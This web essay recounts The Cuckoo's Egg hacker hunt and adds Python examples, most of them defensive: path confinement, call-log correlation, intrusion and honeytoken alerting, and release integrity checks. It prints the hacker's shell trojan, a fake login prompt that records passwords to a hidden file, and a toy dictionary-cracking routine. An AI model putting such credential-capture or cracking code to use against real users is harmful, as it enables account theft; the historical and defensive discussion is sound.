vSpaceLab - San Antonio, TX - Web Design - Database Development - Search Engine Optimization - Corporate Indentity
 
 

Introduction – Ghosts In The Machine

In his book The Cuckoo’s Egg, Cliff Stoll discovers a 75-cent error in the lab’s computer-use accounting, which begins a journey that ultimately reveals a network of hackers in several countries linked to the KGB.  The accounting error tips Stoll off to an uninvited visitor on the Lawrence Berkeley Laboratory computers.  The trail leads through Hannover, Germany, and the Project Equalizer plot, a KGB initiative to pay West German hackers loosely associated with the Chaos Computer Club to break into United States military computers. [2]  These hackers exploited security weaknesses in government-funded research laboratories and military weapons research facilities.

Fifty miles from Berkeley, the Lawrence Livermore Laboratory performed classified nuclear weapons design and Star Wars project research, but its classified systems were protected by isolation: they were not connected to outside networks, so there was nothing to attack remotely.  That protection did not extend to the many other computer systems that were connected to a global network of interconnections.  By systematically enumerating computer systems across Europe, North America, and Japan, Markus Hess, a West German hacker, attempted to break into over 400 computer sites on MILNET and ARPANET.  He succeeded in about 40 of these attempts before finally being brought to justice by the German BKA (the German equivalent of the FBI). [4]

Section 1 – Data Network Primer – Global Connections

Today’s Internet has become a tremendous tool for communication, for the exchange of ideas, and for electronic commerce.  Each day billions of dollars are traded between international banks, sensitive medical records are relayed to waiting rescue teams, and top secret documents are reviewed by military commanders in preparation for war.  Often these transactions go on “behind the scenes,” and auditing them was not treated as a priority.  This information traverses the globe along groups of paired wires, as ultra-high-speed flashes of light through glass fibers, or even as microwave signals bounced off satellites.

Public Switched Telephone Networks, or PSTNs, were originally designed as networks of fixed-line analog telephone systems and were used purely for voice communication for decades.  [5]   When the data modem was introduced, it provided a way to modulate digital signals onto analog lines (and demodulate them back), turning these telephone lines into communication channels for computer systems all over the world.  The original modems were cost-prohibitive, and only large corporations, universities, and government organizations could afford them.  As their cost came down, modems became available to a much larger part of the population.

These modems can be used to connect via a local telephone call to a number of larger private telephone networks.  These private networks are often provided and supported by military or academic concerns and are not directly connected to the Public Network.  There are also private networks run by large companies which are linked to the Public Network only through limited gateways, like a large private branch exchange system.  Originally voice connections were made through manual switchboards, but later automated digital switch technologies were implemented.  Most connections use digital circuits between exchanges, with analog voice circuits used to connect telephones over “the last mile” of service.

The basic digital circuit in the PSTN is a 64-kilobit-per-second channel, originally designed by Bell Labs.  To carry a typical call from the calling party to the called party, the audio is digitized and then transmitted from one end to the other via telephone exchanges.  In recent years digital services have been rolled out to customers using technologies such as DSL (Digital Subscriber Line), ISDN (Integrated Services Digital Network), and cable systems.  Many observers believe that the PSTN will become just one application of the growing Internet as VoIP (Voice over Internet Protocol) technology improves [5].

Threats can now originate from anywhere on the globe and traverse multiple circuit-switched and packet-switched networks to eventually land in your own neighborhood.  Stoll illustrates this when trying to track his hacker through the maze of communication networks [Cuckoo’s Egg pg. 95]:

[Figure: organization chart of the hacker’s network path, not reproduced here]

Once the hacker arrived on the MILNET (Military Network) he could then sneak into Livermore, SRI, Anniston, and MIT completely unrestricted.  [Cuckoo Egg pg. 110]

Stoll also demonstrates this in his statement:

“From MITRE, the hacker had made long-distance connections to Norfolk, Oak Ridge, Omaha, San Diego, Pasadena, Livermore, and Atlanta.  At least as interesting:  He made hundreds of one-minute long phone calls, all across the country, to Air Force bases, Navy shipyards, aircraft builders, and defense contractors.” [Cuckoo’s Egg pg. 156]

Section 2 – Intrusion Detection Techniques – Authenticating A Trace

Stoll is an astronomer by training who had a basic working knowledge of Unix computers and only limited knowledge of hacking techniques and programming practice.  By trial and error, and sometimes by complete accident, he discovers bugs in software, unrestricted network access, and system accounts compromised by weak passwords or no passwords at all.  The hacker was first recognized logging onto Stoll’s Unix-4 and Unix-5 systems under the user ID Sventek.   Instead of locking out the account, Stoll methodically keeps a record of the hacker’s activity in a logbook.  He discovers that a few of his 1200-baud lines were dial-in modems connected to Tymnet.

Tymnet is a communication backbone network that allows subscribers to connect to anyone in the whole country by making a local phone call.  Stoll devises a monitoring system of makeshift 1200-baud Decwriter printers and saves every keystroke of the hacker to paper printouts. [Cuckoo’s Egg pg. 26]

This clever idea also provided a running log of the time and date of all of the hacker’s actions, which would aid prosecution once he was caught.  Stoll also discovers that the hacker sneaked through a hole in security by laying a “cuckoo’s egg” program in the Unix system.  The system would hatch the egg and feed the hacker’s unprivileged account super-user rights.  It was accomplished by substituting a bogus ATRUN program, which the system runs in privileged super-user mode every five minutes.

Once the bogus ATRUN program ran, it elevated the hacker’s basic account to super-user privileges and full control of the machine.  The substitution was accomplished by exploiting a software bug in the editing and mail delivery program GNU Emacs.  The bug allowed files to be moved to any user or location on the system regardless of rights: any program could be placed where a higher-privileged user would run it, without any check on who sent it.  When the bogus ATRUN program was sent to the system manager account and run, it elevated the hacker’s privileges to super-user.  Stoll illustrates this:
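The flaw just described, a privileged helper that will move a file anywhere the caller names, is a general one, and the fix a practitioner wants is path confinement.  The following Python script is an added example written for this page, not code from the book or from GNU Emacs: it models a file-moving helper in its unsafe form beside a confined form that resolves the destination and refuses anything outside an allowed directory.  The directory names, the contents of the stand-in ATRUN file and the scratch tree are all assumptions made for the demonstration.

```python
import os
import shutil
import tempfile


def move_file_unsafe(src: str, dst: str) -> str:
    """Toy model of the flawed helper: move src to dst with no check on where dst
    lies. If this runs with super-user privilege on behalf of an ordinary user,
    that user can drop a file into a system directory (the ATRUN substitution)."""
    shutil.move(src, dst)
    return dst


def move_file_confined(src: str, dst: str, allowed_root: str) -> str:
    """Hardened version: resolve symlinks and '..', then refuse any destination
    that does not stay inside allowed_root (the caller's mail spool, say)."""
    root = os.path.realpath(allowed_root)
    target = os.path.realpath(dst)
    # commonpath catches both '../..' escapes and symlinks pointing outside root
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"destination {dst!r} is outside {allowed_root!r}")
    # never silently replace a file the caller does not own
    if os.path.exists(target) and hasattr(os, "getuid") \
            and os.stat(target).st_uid != os.getuid():
        raise PermissionError(f"destination {dst!r} belongs to another user")
    shutil.move(src, target)
    return target


def _write(path: str, text: str) -> str:
    with open(path, "w") as f:
        f.write(text)
    return path


def demo() -> dict:
    """Replay the attack in a scratch tree (an assumed layout): 'sys/atrun' stands
    in for the real system program, 'spool' for the directory the helper should be
    limited to. Returns what each mover allowed so the outcome can be checked."""
    base = tempfile.mkdtemp()
    sys_dir = os.path.join(base, "sys")
    spool = os.path.join(base, "spool")
    os.makedirs(sys_dir)
    os.makedirs(spool)
    atrun = _write(os.path.join(sys_dir, "atrun"), "#!/bin/sh\n# genuine atrun\n")
    result = {}

    # 1. confined mover, attacker aims at the system directory: must be refused
    try:
        move_file_confined(_write(os.path.join(base, "bogus1"), "# attacker payload\n"),
                           atrun, allowed_root=spool)
        result["confined_blocked"] = False
    except PermissionError:
        result["confined_blocked"] = True
    with open(atrun) as f:
        result["atrun_intact_after_confined"] = "genuine atrun" in f.read()

    # 2. confined mover, legitimate destination inside the spool: must succeed
    dest = move_file_confined(_write(os.path.join(base, "newmail"), "mail\n"),
                              os.path.join(spool, "sventek"), allowed_root=spool)
    result["confined_allowed_inside"] = os.path.isfile(dest)

    # 3. unsafe mover, same attack: the system program is replaced
    move_file_unsafe(_write(os.path.join(base, "bogus2"), "# attacker payload\n"), atrun)
    with open(atrun) as f:
        result["unsafe_overwrote"] = "attacker payload" in f.read()

    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print(demo())
```

The confinement check resolves the path first and only then compares it with the allowed root, so a symlink planted inside the spool that points at the system directory is rejected the same way a literal path is.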

“As Super-User, he had the run of our system.  First thing he did was to erase his tracks:  He switched the good copy of the ATRUN back where it belonged.  He then listed the email of all of our users.  He searched for changes in system manager files, and discovered I had just started work.  He checked my salary and resume.  Every 10 minutes he issued the command “who” to list everyone logged onto the computer.  He also scanned everyone’s email messages for the words “hacker” and “security”.”  [Cuckoo’s Egg pg.30]

Stoll also used correlation analysis software to analyze MITRE’s long-distance bill, which he entered into his Macintosh.  He gave it the criterion of finding all calls that immediately preceded or followed calls to the Anniston Army Depot.  The results of this analysis confirmed that the hacker had broken into 6 to 12 other computers.
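The correlation Stoll ran is a simple join on call records.  The following Python script is an added example, not the program Stoll wrote: given constructed call-detail records in the shape of a long-distance bill, it lists the numbers called immediately before or after each call to an assumed Anniston prefix, and separately counts the short probe calls the quotation above mentions.  The records, the 205-235 prefix and the 30-minute window are assumptions.

```python
from datetime import datetime, timedelta

# Constructed records in the shape of a long-distance bill:
# start time, called number, duration in seconds. Not real MITRE data; the
# 205-235 prefix standing in for Anniston is an assumption.
SAMPLE_BILL = """\
1987-01-10 21:02,205-235-0001,55
1987-01-10 21:04,205-235-0001,480
1987-01-10 21:13,804-444-0010,60
1987-01-10 23:40,402-294-0020,61
1987-01-11 02:15,205-235-0001,900
1987-01-11 02:31,619-553-0030,58
1987-01-12 20:05,617-253-0040,300
"""
ANNISTON_PREFIX = "205-235"


def parse_bill(text):
    """Parse the bill into (start, number, seconds) tuples sorted by start time."""
    rows = []
    for line in text.strip().splitlines():
        ts, number, seconds = line.split(",")
        rows.append((datetime.strptime(ts, "%Y-%m-%d %H:%M"), number, int(seconds)))
    return sorted(rows)


def adjacent_calls(records, target_prefix, window=timedelta(minutes=30)):
    """Numbers called immediately before or after a call to target_prefix,
    within `window` of it: the other machines visited in the same session."""
    hits = set()
    for i, (start, number, _) in enumerate(records):
        if not number.startswith(target_prefix):
            continue
        for j in (i - 1, i + 1):
            if not 0 <= j < len(records):
                continue
            other_start, other_number, _ = records[j]
            if other_number.startswith(target_prefix):
                continue
            if abs(other_start - start) <= window:
                hits.add(other_number)
    return sorted(hits)


def probe_calls(records, max_seconds=90):
    """Count short calls per number: the 'hundreds of one-minute calls' pattern,
    a scan for modems that answer rather than real working sessions."""
    counts = {}
    for _, number, seconds in records:
        if seconds <= max_seconds:
            counts[number] = counts.get(number, 0) + 1
    return counts


if __name__ == "__main__":
    records = parse_bill(SAMPLE_BILL)
    print("adjacent to Anniston:", adjacent_calls(records, ANNISTON_PREFIX))
    print("short probe calls:", probe_calls(records))
```

The time window matters: without it the 23:40 call the evening before would be reported as part of the 02:15 session simply because it is the previous line on the bill.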

Using Kermit to transfer the files, the hacker had installed a small trojan horse program (Stoll calls it a mockingbird program – a false program that sounded like the real thing) to capture passwords:

# fake login banner and prompt (looks like the real login program)
echo -n "Welcome to the LBL Unix-4 Computer"
echo -n "Please Log In Now"
echo -n "LOGIN:"
read account_name
echo -n "Enter Your Password:"
# turn off terminal echo so the typed password is not displayed,
# then append the captured pair to a hidden file in /tmp
(stty -echo; \
 read password; \
 stty echo; \
 echo " "; \
 echo $account_name $password >> /tmp/.pub)
# pretend the login failed so the victim retries on the real prompt
echo "Sorry, Try Again"
[Cuckoo’s Egg pg. 55]

This short program captures a user’s password to a temporary file.  The hacker had written it for an AT&T Unix machine, and it did not install correctly on a Berkeley Unix machine.  This was also an indication that the hacker was not familiar with Berkeley Unix and was possibly not from the West Coast.

In his pursuit, Stoll enlists the aid of Lee Cheng of Pacific Bell and Ed Sell at AT&T in New Jersey to trace the telephone lines.

“When a technician engages in a telephone trace, he logs into the control computer over an ESS maintenance channel.  Line conditioning software is used to display the lines status (busy, idle, off-hook).  He then executes programs to show where the connection came from (routing index, trunk group number, adjacent exchange name).”  [Cuckoo’s Egg pg. 60]

Stoll discovers that the hacker is calling from a European country when Ron Vivier at TYMNET traces a call to an ITT IRC (International Record Carrier).  The call is traced to the Westar-3 satellite, which relays microwave signals between Europe and America.  Steve White, of TYMNET’s transatlantic department, troubleshot TYMNET virtual circuits using the switching computers, or nodes.  There were no wires to trace, only a thread of addresses between the hacker’s computer and Stoll’s at Berkeley.  This eventually led to the hacker being traced by the German Bundespost to Bremen and then Hannover, Germany.

Stoll also created a real-time alert system that called his pocket pager when the hacker logged on.  He wrote a program to page him and beep in Morse code the name of the account the hacker was using.

“I’d know within seconds of the hacker’s arrival.  I’d become an extension of my computer” [Cuckoo Egg pg. 129]

Stoll also created a “honeypot” toward the end of the book: a fake secretary managing a fake classified Star Wars project called SDINET.  Stoll recounts:

“Give the guy what he’s looking for.  Create some files of phony information, laced with bogus secret documents.  Leave ‘em lying around my computer.  The hacker stumbles on them, and then spends a couple of hours lapping it up, copying it all.”  [Cuckoo’s Egg. Pg. 256]

He invented a secretary named Barbara Sherwin, administrator of the fictitious “Strategic Defense Initiative Network Office.”  His fake memoranda included budget requests, purchase orders, and technical descriptions of the new network.  A copy of the lab’s newsletter mailing list was used for the names.

“I just flipped every “Mr.” to “Lieutenant,” every “Mrs.” to “Captain,” every “Dr.” to “Colonel,” and every “Professor” to “General”  [Cuckoo’s Egg pg 259]

Stoll also included a form letter for anyone who wanted more information on the SDINET project.  Amazingly, a request based on the form letter later arrived, asking that the information be sent to a contact named Laszlo J. Balogh in Pittsburgh, Pennsylvania.
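The pager and the decoy files are two alerting rules over the same event stream: a login by a known-bad account, and any read of a document no legitimate user has reason to open.  The following Python script, an added example rather than Stoll’s code, runs both rules over constructed syslog-style lines and produces the Morse page for the account name.  The log format, the account names, the decoy path and the audit messages are assumptions for the example.

```python
import re

# Constructed log lines in a syslog-like shape; not from the book or from LBL.
SAMPLE_LOG = """\
Jan 10 21:03:11 lbl-unix4 login: sventek on ttyp3 from tymnet
Jan 10 21:05:02 lbl-unix4 audit: user sventek read /u/sherwin/sdinet/budget.memo
Jan 10 21:06:40 lbl-unix4 login: cliff on ttyp1 from console
Jan 10 21:07:15 lbl-unix4 audit: user cliff read /u/cliff/notes.txt
Jan 11 02:16:00 lbl-unix4 login: hunter on ttyp5 from tymnet
"""

WATCHED_ACCOUNTS = {"sventek", "hunter"}      # known-compromised accounts (assumed)
HONEYTOKEN_DIRS = ("/u/sherwin/sdinet/",)     # decoy SDINET files nobody legitimate reads

MORSE = {
    "a": ".-", "b": "-...", "c": "-.-.", "d": "-..", "e": ".", "f": "..-.",
    "g": "--.", "h": "....", "i": "..", "j": ".---", "k": "-.-", "l": ".-..",
    "m": "--", "n": "-.", "o": "---", "p": ".--.", "q": "--.-", "r": ".-.",
    "s": "...", "t": "-", "u": "..-", "v": "...-", "w": ".--", "x": "-..-",
    "y": "-.--", "z": "--..", "0": "-----", "1": ".----", "2": "..---",
    "3": "...--", "4": "....-", "5": ".....", "6": "-....", "7": "--...",
    "8": "---..", "9": "----.",
}


def to_morse(text: str) -> str:
    """Encode an account name as the beep pattern sent to the pager."""
    return " ".join(MORSE[c] for c in text.lower() if c in MORSE)


LOGIN_RE = re.compile(r"login: (\S+) on (\S+) from (\S+)")
ACCESS_RE = re.compile(r"audit: user (\S+) read (\S+)")


def scan(log_text: str) -> list:
    """Walk the log once; raise an alert for each watched-account login (with the
    Morse page) and for each read of a decoy file, whoever performed it."""
    alerts = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m and m.group(1) in WATCHED_ACCOUNTS:
            alerts.append({"kind": "login", "user": m.group(1),
                           "origin": m.group(3), "page": to_morse(m.group(1))})
            continue
        m = ACCESS_RE.search(line)
        if m and m.group(2).startswith(HONEYTOKEN_DIRS):
            alerts.append({"kind": "honeytoken", "user": m.group(1),
                           "path": m.group(2)})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The honeytoken rule deliberately does not consult the watched-account list: the value of a decoy is that any access at all is suspicious, including access by an account not yet known to be compromised.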

The hacker also broke into the Butterfly VAX computer at BBN (Bolt Beranek and Newman, in Cambridge, Massachusetts).  He discovered that its root account needed no password.  This computer was particularly sensitive because it was where BBN developed the military’s network software.

“The place to booby-trap software is where it is distributed.  Slip a logic bomb into the development software; it’ll be copied along with the valid programs and shipped to the rest of the country.  A year later, your treacherous code will infest hundreds of computers.”  [Cuckoo’s Egg, pg. 286]
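Catching a booby-trapped distribution after the fact needs a record of what the genuine release looked like.  The following Python script is an added example, not BBN’s or the book’s: it builds a manifest of file digests for a release tree and later verifies a copy against it, reporting files that were modified, removed, or added.  The scratch tree and its contents are constructed for the demonstration; in practice the manifest itself must be signed or delivered out of band, otherwise an attacker at the distribution point simply rewrites it too.

```python
import hashlib
import os
import shutil
import tempfile


def file_digest(path: str) -> str:
    """SHA-256 of a file, read in chunks so large release files are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str) -> dict:
    """Digest every file under root, keyed by path relative to root: the record
    the distributor publishes alongside (and signs separately from) the release."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = file_digest(full)
    return manifest


def verify_tree(root: str, manifest: dict) -> dict:
    """Compare the tree on disk with the manifest. Returns {relpath: status}
    with status one of ok / modified / missing / unexpected."""
    current = build_manifest(root)
    report = {}
    for rel, expected in manifest.items():
        if rel not in current:
            report[rel] = "missing"
        elif current[rel] != expected:
            report[rel] = "modified"
        else:
            report[rel] = "ok"
    for rel in current:
        if rel not in manifest:
            report[rel] = "unexpected"
    return report


def _write(path: str, text: str, mode: str = "w") -> None:
    with open(path, mode) as f:
        f.write(text)


def demo() -> dict:
    """Constructed release tree: record it, then plant changes the way the
    quotation describes, and return what verification reports."""
    base = tempfile.mkdtemp()
    os.makedirs(os.path.join(base, "lib"))
    _write(os.path.join(base, "lib", "netd.c"), "int main(void) { return 0; }\n")
    _write(os.path.join(base, "README"), "network software, release 1\n")
    _write(os.path.join(base, "VERSION"), "1.0\n")
    manifest = build_manifest(base)

    # tampering after the manifest was taken: a source file edited, a file
    # added to the tree, and a file removed from it
    _write(os.path.join(base, "lib", "netd.c"), "/* logic bomb would go here */\n", "a")
    _write(os.path.join(base, "lib", "extra.o"), "junk\n")
    os.remove(os.path.join(base, "README"))

    report = verify_tree(base, manifest)
    shutil.rmtree(base)
    return report


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:10s} {path}")
```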

Stoll also discovered that the hacker was cracking passwords with a dictionary attack: encrypting every word in an English dictionary and comparing the results to the hashes in the stolen password files.  From the speed at which the hacker cracked them, about three weeks, Stoll deduced that he must have been running a password cracker on a VAX or a Sun workstation.

“A hundred thousand [English] words in the dictionary, would take around a day on a VAX.  On an IBM PC, maybe a month.  A Cray supercomputer would take around an hour.”  [Cuckoo’s Egg, pg 306]
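The attack Stoll describes and the arithmetic behind his timing estimate can be made concrete.  The following Python script is an added example, not the hacker’s cracker: it builds a small passwd-style file, runs the dictionary attack against salted hashes, shows the one-pass shortcut that unsalted hashes allow, and turns a word count and a hash rate into days.  The word list, the account names and the hash function (SHA-256 standing in for the DES-based crypt(3) of the period) are assumptions.

```python
import hashlib


def crypt_like(password: str, salt: str = "") -> str:
    """Stand-in for the 1980s crypt(3) call. The real function was DES based;
    SHA-256 is used here only so the example runs anywhere (an assumption)."""
    return hashlib.sha256((salt + ":" + password).encode()).hexdigest()


# Constructed word list and accounts; the passwords are invented for the example.
DICTIONARY = ["password", "welcome", "secret", "astronomy", "sventek", "cuckoo", "hunter"]
ACCOUNTS = [("sventek", "ab", "cuckoo"), ("cliff", "cd", "astronomy"), ("root", "ef", "Zq8!pL")]


def make_passwd(salted: bool) -> str:
    """Build an /etc/passwd-style file, name:salt$hash:uid. The file of the period
    was world-readable, which is why stolen copies could be attacked offline."""
    lines = []
    for uid, (name, salt, pw) in enumerate(ACCOUNTS, start=100):
        s = salt if salted else ""
        lines.append(f"{name}:{s}${crypt_like(pw, s)}:{uid}")
    return "\n".join(lines)


def parse_passwd(text: str) -> list:
    """Return (name, salt, digest) for each line."""
    entries = []
    for line in text.splitlines():
        name, field, _uid = line.split(":")
        salt, digest = field.split("$")
        entries.append((name, salt, digest))
    return entries


def dictionary_attack(entries: list, words: list) -> tuple:
    """Stoll's description: encrypt every word and compare with the stolen hashes.
    With per-user salts every account costs a fresh pass over the word list.
    Returns (cracked, number_of_hash_computations)."""
    cracked, work = {}, 0
    for name, salt, digest in entries:
        for w in words:
            work += 1
            if crypt_like(w, salt) == digest:
                cracked[name] = w
                break
    return cracked, work


def precomputed_attack(entries: list, words: list) -> tuple:
    """Without salt the word list is hashed once and every account is a lookup,
    which is why even the two-character salt of crypt(3) mattered."""
    table = {crypt_like(w, ""): w for w in words}
    cracked = {name: table[d] for name, _, d in entries if d in table}
    return cracked, len(words)


def estimate_days(num_words: int, num_accounts: int, hashes_per_second: float) -> float:
    """Wall-clock estimate for a salted attack: words x accounts / rate, in days."""
    return num_words * num_accounts / hashes_per_second / 86400


if __name__ == "__main__":
    salted = parse_passwd(make_passwd(True))
    print(dictionary_attack(salted, DICTIONARY))
    print(precomputed_attack(parse_passwd(make_passwd(False)), DICTIONARY))
    # Stoll's figure: a hundred thousand words in about a day on one VAX account
    print(estimate_days(100_000, 1, 100_000 / 86400), "days")
```

The root account survives because its password is not a dictionary word, which is the whole point of the attack's economics: the cracker never tries every possible string, only the ones people actually choose.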

Stoll contacted the FBI, the CIA, the Air Force Office of Special Investigations (OSI), and even the NSA in his pursuit of the case, and faced resistance from the authorities at every step.  No one wanted to be accountable for the effort.  The FBI repeatedly dismissed the case because there was no evidence of serious financial damage; it required actual damages of a million dollars or more to open a case officially, and there was no way to put a value on someone merely reading research documents.

The FBI often questioned Stoll’s intentions and suggested that he drop the pursuit, even after the German BKA (Germany’s equivalent of the FBI), with Wolfgang Hoffman, became involved.  Only when his own employer, the Department of Energy (DOE), got involved was Stoll given the go-ahead to continue the search for the hacker.  The CIA would not get involved because it was a domestic matter and the agency is only allowed to operate abroad.  Even Zeke Hanson of the NCSC (National Computer Security Center), a part of the NSA (National Security Agency), could not touch it, because the NSA’s charter only allows for foreign surveillance.  These agencies also seemed interested only in collecting information, not in providing any of value in return.

Since this occurred in the late 1980s, before the Patriot Act, there was little provision for communication between intelligence and law-enforcement agencies.  Wiretap warrants took weeks to obtain, if they were granted at all, which also helped the hacker continue breaking into computer systems.  The Air Force OSI became very interested in who was browsing its data, but did not have jurisdiction to investigate civilian or academic institutions.

Then there was the MITRE Corporation, a military contractor that designed secure computing systems for the government.  Bill Chandler adamantly proclaimed that their systems were highly secure and that there was no way for anyone to hack through their networks.  Only after Stoll revealed that MITRE’s outgoing modem banks were being used by the hacker were they finally shut down.  The hacker could still enter MITRE’s local network, but could no longer exit through their long-distance dial-out modems.  MITRE now thought they were safe.

Conclusion – To Catch A Varmint

The Hannover police finally executed a search warrant on the office of a small computer firm and the apartment of one of its employees on June 29, 1987.  Stoll was officially told to close up his search, and he began to distill all 125 pages of logged notes into a more concise scientific paper.  His quest had lasted a year, in which time he had written dozens of programs, mingled with the FBI, NSA, OSI, and CIA, and made several coast-to-coast flights.

He gave talks at the NSA’s X-1 Department (theoretical software testers who design secure computers).  Markus Hess, Karl Koch, and Hans Huebner were in a group that was selling secret documents to the Soviet KGB in exchange for money and cocaine.  They were loosely associated with the Chaos Computer Club but never directly connected to it.  Printouts and passwords were sold for around $18,000.  They sold their techniques as well:  how to break into VAX computers, which networks to use when crossing the Atlantic, and details of how MILNET operates.

The KGB was also obtaining research data about integrated circuit design, computer-aided manufacturing, and especially operating system software that was under US export control.  Hess got off at his first trial because he had not been at his apartment during the police raid; his attorney argued that no one could prove he was the one doing the hacking.  Karl Koch, known as Hagbard, was last seen alive on May 23, 1989.  Police found his charred bones next to a melted can of gasoline.


Bibliography

[1]  Stoll, Cliff.  The Cuckoo’s Egg.  New York:  Simon & Schuster, Inc., 1989

[2]  Mandia, Kevin, Chris Prosise, and Matt Pepe.  Incident Response & Computer Forensics.  California:  McGraw-Hill / Osborne, 2003

[3]  Sarkar, Anoop.  “Special Circumstances: The Cuckoo’s Egg.”  Weblog post, Aug 24, 2004
http://www.cs.sfu.ca/~anoop/weblog/archives/000052.html

[4]  StreetTech (Gar & Pete’s tech review site).  “The Computer Lab: Cuckoo’s Egg”
http://www.streettech.com/bcp/BCPgraf/StreetTech/cuckoo.htm

[5]  Wikipedia.  “Public Switched Telephone Network”
http://en.wikipedia.org/wiki/PSTN

 
 
 
 
© 2007 vSpaceLab.com